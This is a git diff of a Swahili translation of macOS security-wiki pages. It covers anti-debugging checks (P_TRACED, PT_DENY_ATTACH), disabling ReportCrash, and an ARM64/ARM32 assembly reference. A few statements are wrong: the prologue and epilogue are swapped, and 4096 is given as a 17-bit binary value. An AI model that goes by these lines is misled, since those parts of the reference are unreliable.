> Wakati wa kuita kazi **`objc_sendMsg`**, register **rsi** ina **jina la mbinu** kama mfuatano wa mwisho (“C”). Ili kuchapisha jina kupitia lldb fanya:
@ -460,7 +460,7 @@ settings set target.x86-disassembly-flavor intel
- Pia inawezekana kupata **ikiwa mchakato unashughulikiwa** kwa kutumia msimbo rahisi kama:
- `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //mchakato unashughulikiwa }`
- Inaweza pia kuita **`ptrace`** mfumo wa wito na bendera **`PT_DENY_ATTACH`**. Hii **inazuia** deb**u**gger kuungana na kufuatilia.
- Unaweza kuangalia ikiwa **`sysctl`** au **`ptrace`** kazi inapo **ingizwa** (lakini malware inaweza kuingiza kwa njia ya kidinamik).
- Unaweza kuangalia ikiwa **`sysctl`** au **`ptrace`** kazi inayo **ingizwa** (lakini malware inaweza kuingiza kwa njia ya kidinamik).
- Kama ilivyotajwa katika andiko hili, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
“_Ujumbe Mchakato # ulitoka na **hali = 45 (0x0000002d)** mara nyingi ni ishara ya wazi kwamba lengo la debug linatumia **PT_DENY_ATTACH**_”
@ -480,9 +480,9 @@ Katika hali hizo core dumps inaundwa kulingana na `kern.corefile` sysctl na kuhi
ReportCrash **inafanya uchambuzi wa michakato inayoshindwa na kuhifadhi ripoti ya ajali kwenye diski**. Ripoti ya ajali ina habari ambayo inaweza **kusaidia mendelezi kutambua** sababu ya ajali.\
Kwa programu na michakato mingine **inayoendesha katika muktadha wa per-user launchd**, ReportCrash inakimbia kama LaunchAgent na kuhifadhi ripoti za ajali katika `~/Library/Logs/DiagnosticReports/` ya mtumiaji\
Kwa daemons, michakato mingine **inayoendesha katika muktadha wa system launchd** na michakato mingine yenye mamlaka, ReportCrash inakimbia kama LaunchDaemon na kuhifadhi ripoti za ajali katika `/Library/Logs/DiagnosticReports` ya mfumo
Kwa daemons, michakato mingine **inayoendesha katika muktadha wa system launchd** na michakato mingine yenye mamlaka, ReportCrash inakimbia kama LaunchDaemon na kuhifadhi ripoti za ajali katika `/Library/Logs/DiagnosticReports` ya mfumo.
Ikiwa unahofia ripoti za ajali **zinatumwa kwa Apple** unaweza kuzizima. Ikiwa la, ripoti za ajali zinaweza kuwa na manufaa katika **kugundua jinsi seva ilivyoshindwa**.
Ikiwa unahofia ripoti za ajali **zinazosambazwa kwa Apple** unaweza kuzizima. Ikiwa la, ripoti za ajali zinaweza kuwa na manufaa katika **kugundua jinsi seva ilivyoshindwa**.
```bash
#To disable crash reporting:
launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist

118
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
View File

@ -17,7 +17,7 @@ Katika usanifu wa ARMv8, viwango vya utekelezaji, vinavyojulikana kama Viwango v
- EL2 inatoa vipengele vya kutenganisha na kudhibiti mazingira yaliyohalalishwa.
4. **EL3 - Hali ya Msimamizi Salama**:
- Hiki ndicho kiwango chenye ruhusa kubwa zaidi na mara nyingi kinatumika kwa kuanzisha salama na mazingira ya utekelezaji yaliyoaminika.
- EL3 inaweza kusimamia na kudhibiti ufikiaji kati ya hali salama na zisizo salama (kama vile kuanzisha salama, OS iliyoaminika, n.k.).
- EL3 inaweza kusimamia na kudhibiti ufikiaji kati ya hali salama na zisizo salama (kama kuanzisha salama, OS iliyoaminika, n.k.).
Matumizi ya viwango hivi yanaruhusu njia iliyopangwa na salama ya kusimamia vipengele tofauti vya mfumo, kutoka kwa programu za mtumiaji hadi programu za mfumo zenye ruhusa kubwa zaidi. Mbinu ya ARMv8 kuhusu viwango vya ruhusa inasaidia katika kutenganisha kwa ufanisi vipengele tofauti vya mfumo, hivyo kuimarisha usalama na uimara wa mfumo.
@ -31,19 +31,19 @@ ARM64 ina **register 31 za matumizi ya jumla**, zilizoandikwa `x0` hadi `x30`. K
3. **`x9`** hadi **`x15`** - Register zaidi za muda, mara nyingi hutumiwa kwa mabadiliko ya ndani.
4. **`x16`** na **`x17`** - **Register za Wito wa Ndani**. Register za muda kwa thamani za papo hapo. Pia zinatumika kwa wito wa kazi zisizo za moja kwa moja na PLT (Jedwali la Uunganishaji wa Utaratibu).
- **`x16`** inatumika kama **nambari ya wito wa mfumo** kwa amri ya **`svc`** katika **macOS**.
5. **`x18`** - **Register ya Jukwaa**. Inaweza kutumika kama register ya matumizi ya jumla, lakini kwenye majukwaa mengine, register hii imehifadhiwa kwa matumizi maalum ya jukwaa: Kielelezo cha block ya mazingira ya thread ya sasa katika Windows, au kuonyesha muundo wa kazi inayotekelezwa sasa katika kernel ya linux.
6. **`x19`** hadi **`x28`** - Hizi ni register zilizohifadhiwa na mteja. Kazi lazima ihifadhi thamani za register hizi kwa mwito wake, hivyo zinahifadhiwa kwenye stack na kurejeshwa kabla ya kurudi kwa mwito.
7. **`x29`** - **Kielelezo cha fremu** ili kufuatilia fremu ya stack. Wakati fremu mpya ya stack inaundwa kwa sababu kazi inaitwa, register ya **`x29`** inahifadhiwa kwenye **stack** na anwani ya **fremu mpya** (anwani ya **`sp`**) inahifadhiwa katika register hii.
5. **`x18`** - **Register ya Jukwaa**. Inaweza kutumika kama register ya matumizi ya jumla, lakini kwenye majukwaa mengine, register hii imehifadhiwa kwa matumizi maalum ya jukwaa: Kielelezo cha block ya mazingira ya thread ya sasa katika Windows, au kuonyesha muundo wa kazi inayotekelezwa kwa sasa katika kernel ya linux.
6. **`x19`** hadi **`x28`** - Hizi ni register zilizohifadhiwa na mpokeaji. Kazi lazima ihifadhi thamani za register hizi kwa mpokeaji wake, hivyo zinahifadhiwa kwenye stack na kurejeshwa kabla ya kurudi kwa mpokeaji.
7. **`x29`** - **Kielelezo cha fremu** ili kufuatilia fremu ya stack. Wakati fremu mpya ya stack inaundwa kwa sababu kazi inaitwa, register ya **`x29`** inahifadhiwa kwenye **stack** na anwani ya **fremu mpya** ni (**`sp`** anwani) inahifadhiwa katika register hii.
- Register hii inaweza pia kutumika kama **register ya matumizi ya jumla** ingawa kawaida hutumiwa kama rejeleo kwa **mabadiliko ya ndani**.
8. **`x30`** au **`lr`**- **Register ya Kiungo**. Inashikilia **anwani ya kurudi** wakati amri ya `BL` (Tawi na Kiungo) au `BLR` (Tawi na Kiungo kwa Register) inatekelezwa kwa kuhifadhi thamani ya **`pc`** katika register hii.
- Inaweza pia kutumika kama register nyingine yoyote.
- Ikiwa kazi ya sasa inakusudia kuita kazi mpya na hivyo kuandika `lr`, itahifadhiwa kwenye stack mwanzoni, hii ni epilogue (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> Hifadhi `fp` na `lr`, tengeneza nafasi na pata `fp` mpya) na kurejeshwa mwishoni, hii ni prologue (`ldp x29, x30, [sp], #48; ret` -> Rejesha `fp` na `lr` na urudi).
9. **`sp`** - **Kielelezo cha Stack**, kinatumika kufuatilia kilele cha stack.
- Ikiwa kazi ya sasa inakusudia kuita kazi mpya na hivyo kuandika `lr`, itahifadhiwa kwenye stack mwanzoni, hii ni epilogue (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> Hifadhi `fp` na `lr`, tengeneza nafasi na pata `fp` mpya) na kurejeshwa mwishoni, hii ni prologue (`ldp x29, x30, [sp], #48; ret` -> Rejesha `fp` na `lr` na rudi).
9. **`sp`** - **Kielelezo cha Stack**, kinachotumika kufuatilia kilele cha stack.
- thamani ya **`sp`** inapaswa kudumishwa kuwa angalau **quadword** **mwelekeo** au mwelekeo wa makosa unaweza kutokea.
10. **`pc`** - **Kikokotoo cha Programu**, ambacho kinaelekeza kwenye amri inayofuata. Register hii inaweza kusasishwa tu kupitia uzalishaji wa makosa, marejesho ya makosa, na matawi. Amri za kawaida pekee zinazoweza kusoma register hii ni amri za tawi na kiungo (BL, BLR) kuhifadhi anwani ya **`pc`** katika **`lr`** (Register ya Kiungo).
10. **`pc`** - **Kikokotoo cha Programu**, ambacho kinaelekeza kwenye amri inayofuata. Register hii inaweza kusasishwa tu kupitia uzalishaji wa makosa, marejesho ya makosa, na matawi. Amri pekee za kawaida zinazoweza kusoma register hii ni amri za tawi na kiungo (BL, BLR) kuhifadhi anwani ya **`pc`** katika **`lr`** (Register ya Kiungo).
11. **`xzr`** - **Register ya Sifuri**. Pia inaitwa **`wzr`** katika fomu yake ya register **32**-bit. Inaweza kutumika kupata thamani ya sifuri kwa urahisi (operesheni ya kawaida) au kufanya kulinganisha kwa kutumia **`subs`** kama **`subs XZR, Xn, #10`** ikihifadhi data inayotokana mahali popote (katika **`xzr`**).
Register za **`Wn`** ni toleo la **32bit** la register za **`Xn`**.
Register za **`Wn`** ni toleo la **32bit** la register **`Xn`**.
### SIMD na Register za Pointi za Kuogelea
@ -51,10 +51,10 @@ Zaidi ya hayo, kuna register nyingine **32 za urefu wa 128bit** ambazo zinaweza
### Register za Mfumo
**Kuna mamia ya register za mfumo**, pia zinazoitwa register za matumizi maalum (SPRs), zinatumika kwa **kuangalia** na **kudhibiti** tabia za **processors**.\
**Kuna mamia ya register za mfumo**, pia zinajulikana kama register za matumizi maalum (SPRs), zinatumika kwa **kuangalia** na **kudhibiti** tabia za **processors**.\
Zinaweza kusomwa au kuwekwa tu kwa kutumia amri maalum zilizotengwa **`mrs`** na **`msr`**.
Register maalum **`TPIDR_EL0`** na **`TPIDDR_EL0`** mara nyingi hupatikana wakati wa uhandisi wa kurudi. Kiambishi cha `EL0` kinaonyesha **kigezo kidogo** ambacho register inaweza kufikiwa (katika kesi hii EL0 ni kiwango cha kawaida cha kigezo (ruhusa) ambacho programu za kawaida zinakimbia).\
Register maalum **`TPIDR_EL0`** na **`TPIDDR_EL0`** mara nyingi hupatikana wakati wa uhandisi wa kurudi. Kiambatisho cha `EL0` kinaonyesha **kigezo kidogo** ambacho register inaweza kufikiwa (katika kesi hii EL0 ni kiwango cha kawaida cha kigezo (ruhusa) ambacho programu za kawaida zinakimbia).\
Mara nyingi hutumiwa kuhifadhi **anwani ya msingi ya eneo la uhifadhi wa thread-local** la kumbukumbu. Kawaida ya kwanza inasomeka na kuandikwa kwa programu zinazokimbia katika EL0, lakini ya pili inaweza kusomwa kutoka EL0 na kuandikwa kutoka EL1 (kama kernel).
- `mrs x0, TPIDR_EL0 ; Soma TPIDR_EL0 ndani ya x0`
@ -83,14 +83,14 @@ Hizi ndizo sehemu zinazoweza kufikiwa:
- Bendera ya **upana wa register wa sasa (`nRW`)**: Ikiwa bendera ina thamani 0, programu itakimbia katika hali ya utekelezaji ya AArch64 mara itakaporejeshwa.
- **Kiwango cha Kigezo** (**`EL`**): Programu ya kawaida inayokimbia katika EL0 itakuwa na thamani 0
- Bendera ya **kuangalia moja** (**`SS`**): Inatumika na debuggers kuangalia moja kwa moja kwa kuweka bendera ya SS kuwa 1 ndani ya **`SPSR_ELx`** kupitia kigezo. Programu itakimbia hatua moja na kutoa kigezo cha hatua moja.
- Bendera ya hali ya **kigezo kisicho halali** (**`IL`**): Inatumika kuashiria wakati programu yenye ruhusa inafanya uhamisho wa kiwango cha kigezo kisicho halali, bendera hii inawekwa kuwa 1 na processor inasababisha kigezo cha hali isiyo halali.
- Bendera ya hali ya **kigezo kisichofaa** (**`IL`**): Inatumika kuashiria wakati programu yenye ruhusa inafanya uhamisho wa kiwango cha kigezo kisichofaa, bendera hii inawekwa kuwa 1 na processor inasababisha kigezo kisichofaa.
- Bendera za **`DAIF`**: Bendera hizi zinaruhusu programu yenye ruhusa kuchuja kwa hiari kigezo fulani za nje.
- Ikiwa **`A`** ni 1 inamaanisha **kuanzishwa kwa asynchronous** kutasababisha. **`I`** inasanidiwa kujibu **Maombi ya Interrupt za vifaa vya nje** (IRQs). na F inahusiana na **Maombi ya Interrupt za Haraka** (FIRs).
- Bendera za **uchaguzi wa kielelezo cha stack** (**`SPS`**): Programu zenye ruhusa zinazokimbia katika EL1 na juu zinaweza kubadilisha kati ya kutumia register yao ya kielelezo cha stack na ile ya mtumiaji (kwa mfano, kati ya `SP_EL1` na `EL0`). Kubadilisha hii inafanywa kwa kuandika kwenye register maalum ya **`SPSel`**. Hii haiwezi kufanywa kutoka EL0.
- Ikiwa **`A`** ni 1 inamaanisha **kuanzishwa kwa asynchronous** kutasababisha. **`I`** inasanidiwa kujibu **Maombi ya Interrupt ya vifaa vya nje** (IRQs). na F inahusiana na **Maombi ya Interrupt ya Haraka** (FIRs).
- Bendera za **uchaguzi wa kielelezo cha stack** (**`SPS`**): Programu zenye ruhusa zinazokimbia katika EL1 na zaidi zinaweza kubadilisha kati ya kutumia register yao ya kielelezo cha stack na ile ya mtumiaji (k.m. kati ya `SP_EL1` na `EL0`). Kubadilisha hii inafanywa kwa kuandika kwenye register maalum ya **`SPSel`**. Hii haiwezi kufanywa kutoka EL0.
## **Mkataba wa Wito (ARM64v8)**
Mkataba wa wito wa ARM64 unasisitiza kwamba **vigezo vinane vya kwanza** kwa kazi vinapitishwa katika register **`x0` hadi `x7`**. **Vigezo** vya ziada vinapitishwa kwenye **stack**. Thamani ya **kurudi** inarudishwa katika register **`x0`**, au katika **`x1`** pia **ikiwa ni 128 bits ndefu**. Register za **`x19`** hadi **`x30`** na **`sp`** lazima **zihifadhiwe** wakati wa wito wa kazi.
Mkataba wa wito wa ARM64 unasisitiza kwamba **vigezo vinane vya kwanza** kwa kazi vinapitishwa katika register **`x0` hadi `x7`**. **Vigezo vya ziada** vinapitishwa kwenye **stack**. Thamani ya **kurudi** inarudishwa katika register **`x0`**, au katika **`x1`** pia **ikiwa ni 128 bits ndefu**. Register za **`x19`** hadi **`x30`** na **`sp`** lazima **zihifadhiwe** wakati wa wito wa kazi.
Wakati wa kusoma kazi katika assembly, angalia **prologue na epilogue ya kazi**. **Prologue** kawaida inahusisha **kuhifadhi kielelezo cha fremu (`x29`)**, **kuweka** kielelezo **kipya cha fremu**, na **kuandaa nafasi ya stack**. **Epilogue** kawaida inahusisha **kurejesha kielelezo cha fremu kilichohifadhiwa** na **kurudi** kutoka kwa kazi.
@ -109,28 +109,28 @@ Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opc
- **Njia ya Offset**: Offset inayohusiana na kiashiria cha asili inaonyeshwa, kwa mfano:
- `ldr x2, [x1, #8]`, hii itapakia x2 thamani kutoka x1 + 8
- `ldr x2, [x0, x1, lsl #2]`, hii itapakia x2 kitu kutoka kwenye array x0, kutoka kwenye nafasi x1 (index) \* 4
- **Njia ya Pre-indexed**: Hii itatumika kufanya hesabu kwa asili, kupata matokeo na pia kuhifadhi asili mpya katika asili.
- **Njia ya Pre-indexed**: Hii itatumika kwa hesabu kwenye asili, kupata matokeo na pia kuhifadhi asili mpya kwenye asili.
- `ldr x2, [x1, #8]!`, hii itapakia `x1 + 8` ndani ya `x2` na kuhifadhi katika x1 matokeo ya `x1 + 8`
- `str lr, [sp, #-4]!`, Hifadhi register ya kiungo katika sp na sasisha register sp
- **Njia ya Post-index**: Hii ni kama ile ya awali lakini anwani ya kumbukumbu inafikiwa na kisha offset inakokotwa na kuhifadhiwa.
- `ldr x0, [x1], #8`, pakia `x1` ndani ya `x0` na sasisha x1 na `x1 + 8`
- **Kuhusisha anwani ya PC**: Katika kesi hii anwani ya kupakia inakokotwa kulingana na register ya PC
- `ldr x1, =_start`, Hii itapakia anwani ambapo alama ya `_start` inaanza ndani ya x1 inayohusiana na PC ya sasa.
- `ldr x1, =_start`, Hii itapakia anwani ambapo alama ya `_start` inaanzia ndani ya x1 inayohusiana na PC ya sasa.
- **`str`**: **Hifadhi** thamani kutoka **register** hadi **kumbukumbu**.
- Mfano: `str x0, [x1]` — Hii inahifadhi thamani katika `x0` ndani ya eneo la kumbukumbu lililoonyeshwa na `x1`.
- **`ldp`**: **Pakia Jozi za Register**. Amri hii **inapakia register mbili** kutoka **maeneo ya kumbukumbu** yanayofuatana. Anwani ya kumbukumbu kawaida huundwa kwa kuongeza offset kwa thamani katika register nyingine.
- Mfano: `str x0, [x1]` — Hii inahifadhi thamani katika `x0` kwenye eneo la kumbukumbu lililoonyeshwa na `x1`.
- **`ldp`**: **Pakia Jozi za Register**. Amri hii **inapakia register mbili** kutoka **sehemu za mfululizo za kumbukumbu**. Anwani ya kumbukumbu kawaida huundwa kwa kuongeza offset kwa thamani katika register nyingine.
- Mfano: `ldp x0, x1, [x2]` — Hii inapakua `x0` na `x1` kutoka maeneo ya kumbukumbu katika `x2` na `x2 + 8`, mtawalia.
- **`stp`**: **Hifadhi Jozi za Register**. Amri hii **inahifadhi register mbili** kwenye **maeneo ya kumbukumbu** yanayofuatana. Anwani ya kumbukumbu kawaida huundwa kwa kuongeza offset kwa thamani katika register nyingine.
- **`stp`**: **Hifadhi Jozi za Register**. Amri hii **inahifadhi register mbili** kwenye **sehemu za mfululizo za kumbukumbu**. Anwani ya kumbukumbu kawaida huundwa kwa kuongeza offset kwa thamani katika register nyingine.
- Mfano: `stp x0, x1, [sp]` — Hii inahifadhi `x0` na `x1` kwenye maeneo ya kumbukumbu katika `sp` na `sp + 8`, mtawalia.
- `stp x0, x1, [sp, #16]!` — Hii inahifadhi `x0` na `x1` kwenye maeneo ya kumbukumbu katika `sp+16` na `sp + 24`, mtawalia, na sasisha `sp` na `sp+16`.
- **`add`**: **Ongeza** thamani za register mbili na uhifadhi matokeo katika register.
- Sintaksia: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX]
- Xn1 -> Marudio
- Xn1 -> Malengo
- Xn2 -> Operandi 1
- Xn3 | #imm -> Operandi 2 (register au papo hapo)
- \[shift #N | RRX] -> Fanya shift au piga RRX
- Mfano: `add x0, x1, x2` — Hii inaongeza thamani katika `x1` na `x2` pamoja na kuhifadhi matokeo katika `x0`.
- `add x5, x5, #1, lsl #12` — Hii inalingana na 4096 (1 ikihamishwa mara 12) -> 1 0000 0000 0000 0000
- `add x5, x5, #1, lsl #12` — Hii inalingana na 4096 (1 shifter mara 12) -> 1 0000 0000 0000 0000
- **`adds`** Hii inafanya `add` na inasasisha bendera
- **`sub`**: **Punguza** thamani za register mbili na uhifadhi matokeo katika register.
- Angalia **`add`** **sintaksia**.
@ -146,31 +146,31 @@ Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opc
- **Shift ya Kihisia Kulia**: Kama **`lsr`**, lakini badala ya kuongeza 0s ikiwa bit muhimu zaidi ni 1, **1s zinaongezwa** (gawanya kwa n-mara 2 katika saini)
- **Pindua Kulia**: Kama **`lsr`** lakini chochote kinachondolewa kutoka kulia kinajumuishwa kushoto
- **Pindua Kulia na Kuongeza**: Kama **`ror`**, lakini na bendera ya kubeba kama "bit muhimu zaidi". Hivyo bendera ya kubeba inahamishwa kwa bit 31 na bit iliyondolewa kwa bendera ya kubeba.
- **`bfm`**: **Hamisha Uwanja wa Bit**, operesheni hizi **nakala bits `0...n`** kutoka thamani na kuziweka katika nafasi **`m..m+n`**. **`#s`** inaonyesha **nafasi ya bit ya kushoto** na **`#r`** ni **kiasi cha kuhamasisha kulia**.
- **`bfm`**: **Hamisha Uwanja wa Bit**, operesheni hizi **nakala bits `0...n`** kutoka thamani na kuziweka katika nafasi **`m..m+n`**. **`#s`** inaonyesha **nafasi ya bit ya kushoto** na **`#r`** kiwango cha **kuhamasisha kulia**.
- Hamisha uwanja wa bit: `BFM Xd, Xn, #r`
- Hamisha uwanja wa bit wa Saini: `SBFM Xd, Xn, #r, #s`
- Hamisha uwanja wa bit wenye saini: `SBFM Xd, Xn, #r, #s`
- Hamisha uwanja wa bit usio na saini: `UBFM Xd, Xn, #r, #s`
- **Kutoa na Kuingiza Uwanja wa Bit:** Nakala uwanja wa bit kutoka register moja na kuhamasisha kwa register nyingine.
- **Kutoa na Kuingiza Uwanja wa Bit:** Nakala uwanja wa bit kutoka register moja na kuhamasisha kwenye register nyingine.
- **`BFI X1, X2, #3, #4`** Ingiza bits 4 kutoka X2 kutoka bit ya 3 ya X1
- **`BFXIL X1, X2, #3, #4`** Toa kutoka bit ya 3 ya X2 bits nne na kuhamasisha kwa X1
- **`SBFIZ X1, X2, #3, #4`** Ongeza saini bits 4 kutoka X2 na kuhamasisha kwa X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`SBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit ya 3 kutoka X2, inaongeza saini, na kuweka matokeo katika X1
- **`UBFIZ X1, X2, #3, #4`** Ongeza sifuri bits 4 kutoka X2 na kuhamasisha kwa X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`UBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit ya 3 kutoka X2 na kuweka matokeo yaliyoongezwa sifuri katika X1.
- **`BFXIL X1, X2, #3, #4`** Toa kutoka bit ya 3 ya X2 bits nne na kuhamasisha kwenye X1
- **`SBFIZ X1, X2, #3, #4`** Ongeza saini bits 4 kutoka X2 na kuhamasisha kwenye X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`SBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit 3 kutoka X2, inaongeza saini, na kuweka matokeo katika X1
- **`UBFIZ X1, X2, #3, #4`** Ongeza sifuri bits 4 kutoka X2 na kuhamasisha kwenye X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`UBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit 3 kutoka X2 na kuweka matokeo yaliyoongezwa sifuri katika X1.
- **Ongeza Saini kwa X:** Ongeza saini (au ongeza tu 0s katika toleo lisilo na saini) ya thamani ili uweze kufanya operesheni nayo:
- **`SXTB X1, W2`** Ongeza saini ya byte **kutoka W2 hadi X1** (`W2` ni nusu ya `X2`) ili kujaza 64bits
- **`SXTH X1, W2`** Ongeza saini ya nambari ya 16bit **kutoka W2 hadi X1** ili kujaza 64bits
- **`SXTW X1, W2`** Ongeza saini ya byte **kutoka W2 hadi X1** ili kujaza 64bits
- **`UXTB X1, W2`** Ongeza 0s (isiyo na saini) kwa byte **kutoka W2 hadi X1** ili kujaza 64bits
- **`extr`:** Inatoa bits kutoka **pair ya register zilizounganishwa**.
- **`extr`:** Inatoa bits kutoka **jozi maalum za register zilizounganishwa**.
- Mfano: `EXTR W3, W2, W1, #3` Hii itajumuisha **W1+W2** na kupata **kuanzia bit 3 ya W2 hadi bit 3 ya W1** na kuhifadhi katika W3.
- **`cmp`**: **Linganisha** register mbili na kuweka bendera za hali. Ni **alias ya `subs`** ikiseti register ya marudio kuwa register ya sifuri. Inafaida kujua ikiwa `m == n`.
- **`cmp`**: **Linganisha** register mbili na kuweka bendera za hali. Ni **alias ya `subs`** ikiseti register ya malengo kuwa register ya sifuri. Inafaida kujua ikiwa `m == n`.
- Inasaidia **sintaksia sawa na `subs`**
- Mfano: `cmp x0, x1` — Hii inalinganisha thamani katika `x0` na `x1` na kuweka bendera za hali ipasavyo.
- **`cmn`**: **Linganishi operandi hasi**. Katika kesi hii ni **alias ya `adds`** na inasaidia sintaksia sawa. Inafaida kujua ikiwa `m == -n`.
- **`ccmp`**: Linganisha kwa masharti, ni kulinganisha ambayo itafanywa tu ikiwa kulinganisha ya awali ilikuwa kweli na itaseti bit za nzcv kwa usahihi.
- **`cmn`**: **Linganishi operand hasi**. Katika kesi hii ni **alias ya `adds`** na inasaidia sintaksia sawa. Inafaida kujua ikiwa `m == -n`.
- **`ccmp`**: Linganisha kwa masharti, ni kulinganisha ambayo itafanywa tu ikiwa kulinganisha ya awali ilikuwa kweli na itaseti bits za nzcv kwa usahihi.
- `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> ikiwa x1 != x2 na x3 < x4, ruka kwa func
- Hii ni kwa sababu **`ccmp`** itatekelezwa tu ikiwa **`cmp` ya awali ilikuwa `NE`**, ikiwa haikuwa bit `nzcv` zitakuwa zimewekwa kuwa 0 (ambayo haitaridhisha kulinganisha `blt`).
- Hii ni kwa sababu **`ccmp`** itatekelezwa tu ikiwa **`cmp` ya awali ilikuwa `NE`**, ikiwa haikuwa bits `nzcv` zitawekwa kuwa 0 (ambayo haitaridhisha kulinganisha `blt`).
- Hii pia inaweza kutumika kama `ccmn` (sawa lakini hasi, kama `cmp` dhidi ya `cmn`).
- **`tst`**: Inakagua ikiwa yoyote ya thamani za kulinganisha ni 1 (inafanya kazi kama ANDS bila kuhifadhi matokeo mahali popote). Inafaida kuangalia register na thamani na kuangalia ikiwa yoyote ya bits za register iliyoonyeshwa katika thamani ni 1.
- Mfano: `tst X1, #7` Angalia ikiwa yoyote ya bits tatu za mwisho za X1 ni 1
@ -192,9 +192,9 @@ Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opc
- Mfano: Baada ya amri ya `cmp x0, x1`, `b.ne label` — Ikiwa thamani katika `x0` na `x1` hazikuwa sawa, hii inaruka kwa `label`.
- **`cbz`**: **Linganishi na Tawi kwenye Sifuri**. Amri hii inalinganisha register na sifuri, na ikiwa sawa, inatunga kwa lebo au anwani.
- Mfano: `cbz x0, label` — Ikiwa thamani katika `x0` ni sifuri, hii inaruka kwa `label`.
- **`cbnz`**: **Linganishi na Tawi kwenye Sio Sifuri**. Amri hii inalinganisha register na sifuri, na ikiwa hazikuwa sawa, inatunga kwa lebo au anwani.
- Mfano: `cbnz x0, label` — Ikiwa thamani katika `x0` sio sifuri, hii inaruka kwa `label`.
- **`tbnz`**: Jaribu bit na tawi kwenye sio sifuri
- **`cbnz`**: **Linganishi na Tawi kwenye Siyo Sifuri**. Amri hii inalinganisha register na sifuri, na ikiwa hazikuwa sawa, inatunga kwa lebo au anwani.
- Mfano: `cbnz x0, label` — Ikiwa thamani katika `x0` si sifuri, hii inaruka kwa `label`.
- **`tbnz`**: Jaribu bit na tawi kwenye si sifuri
- Mfano: `tbnz x0, #8, label`
- **`tbz`**: Jaribu bit na tawi kwenye sifuri
- Mfano: `tbz x0, #8, label`
@ -213,15 +213,15 @@ Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opc
- **`ldrsw`**: **Pakia** thamani ya saini **32-bit** kutoka kumbukumbu na **ongeza saini hadi 64** bits.
- Mfano: `ldrsw x0, [x1]` — Hii inapakua thamani ya saini ya 32-bit kutoka eneo la kumbukumbu lililoonyeshwa na `x1`, inaongeza saini hadi 64 bits, na kuihifadhi katika `x0`.
- **`stur`**: **Hifadhi thamani ya register kwenye eneo la kumbukumbu**, kwa kutumia offset kutoka register nyingine.
- Mfano: `stur x0, [x1, #4]` — Hii inahifadhi thamani katika `x0` ndani ya anwani ya kumbukumbu ambayo ni bytes 4 zaidi kuliko anwani iliyopo katika `x1`.
- **`svc`** : Fanya **wito wa mfumo**. Inasimama kwa "Wito wa Msimamizi". Wakati processor inatekeleza amri hii, inabadilisha kutoka hali ya mtumiaji hadi hali ya kernel na kuruka kwenye eneo maalum la kumbukumbu ambapo **msimbo wa kushughulikia wito wa mfumo wa kernel** unapatikana.
- Mfano: `stur x0, [x1, #4]` — Hii inahifadhi thamani katika `x0` kwenye anwani ya kumbukumbu ambayo ni bytes 4 zaidi kuliko anwani iliyopo katika `x1`.
- **`svc`** : Fanya **wito wa mfumo**. Inasimama kwa "Wito wa Msimamizi". Wakati processor inatekeleza amri hii, inabadilisha kutoka hali ya mtumiaji hadi hali ya kernel na kuruka kwenye eneo maalum la kumbukumbu ambapo **kanuni ya kushughulikia wito wa mfumo wa kernel** inapatikana.
- Mfano:
```armasm
mov x8, 93 ; Pakia nambari ya wito wa mfumo kwa kutoka (93) ndani ya register x8.
mov x0, 0 ; Pakia msimamo wa kutoka (0) ndani ya register x0.
svc 0 ; Fanya wito wa mfumo.
mov x8, 93 ; Load the system call number for exit (93) into register x8.
mov x0, 0 ; Load the exit status code (0) into register x0.
svc 0 ; Make the system call.
```
### **Prologue ya Kazi**
@ -235,7 +235,7 @@ stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement t
### **Hitimisho la Kazi**
1. **Ondoa mabadiliko ya ndani (ikiwa yoyote ilipangwa)**: `add sp, sp, <size>`
1. **Ondoa mabadiliko ya ndani (ikiwa yoyote yalipangwa)**: `add sp, sp, <size>`
2. **Rejesha kiashiria cha kiungo na kiashiria cha fremu**:
```armasm
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
@ -264,7 +264,7 @@ mov r0, #8
```
### Registers
Kuna register 16 za 32-bit (r0-r15). **Kuanzia r0 hadi r14** zinaweza kutumika kwa **operesheni yoyote**, hata hivyo baadhi yao mara nyingi huhifadhiwa:
Kuna register 16 za 32-bit (r0-r15). **Kuanzia r0 hadi r14** zinaweza kutumika kwa **operesheni yoyote**, hata hivyo baadhi yao mara nyingi zimehifadhiwa:
- **`r15`**: Program counter (daima). Inashikilia anwani ya amri inayofuata. Katika A32 sasa + 8, katika T32, sasa + 4.
- **`r11`**: Frame Pointer
@ -292,7 +292,7 @@ Sehemu zimegawanywa katika makundi kadhaa:
- Bendera **`Q`**: Inapangwa kuwa 1 kila wakati **saturation ya integer inapotokea** wakati wa utekelezaji wa amri maalum ya hesabu inayoshikilia. Mara inapowekwa kuwa **`1`**, itahifadhi thamani hiyo hadi iwekwe kwa mikono kuwa 0. Zaidi ya hayo, hakuna amri inayokagua thamani yake kwa njia isiyo ya moja kwa moja, inapaswa kufanywa kwa kusoma kwa mikono.
- Bendera **`GE`** (Kubwa kuliko au sawa): Inatumika katika operesheni za SIMD (Single Instruction, Multiple Data), kama vile "kuongeza kwa pamoja" na "kupunguza kwa pamoja". Operesheni hizi zinaruhusu kusindika vidokezo vingi vya data katika amri moja.
